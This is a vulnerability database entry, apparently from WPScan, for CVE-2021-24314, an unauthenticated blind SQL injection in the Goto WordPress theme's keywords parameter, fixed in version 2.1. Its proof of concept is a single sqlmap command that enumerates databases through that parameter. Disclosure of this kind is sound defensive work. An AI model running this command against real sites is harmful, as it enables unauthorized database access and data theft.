logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Goto < 2.1 - Unauthenticated Blind SQL Injection

Description

The theme did not sanitise, validate of escape the keywords GET parameter from its listing page before using it in a SQL statement, leading to an Unauthenticated SQL injection issue

Proof of Concept

sqlmap --url="https://example.com/tour-list/?keywords=13&start_date=13" --random-agent -dbs --level=3 --threads=4 --dbms=MySQL -p keywords

Affects Themes

goto

Fixed in version 2.1

References

CVE

CVE-2021-24314

URL

https://m0ze.ru/vulnerability/%5B2021-03-24%5D-%5BWordPress%5D-%5BCWE-89%5D-Goto-WordPress-Theme-v2.0.txt

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

m0ze

Verified

No

WPVDB ID

1cc6dc17-b019-49dd-8149-c8bba165eb30

Timeline

Publicly Published

2021-04-26 (about 3 months ago)

Added

2021-04-29 (about 2 months ago)

Last Updated

2021-05-17 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin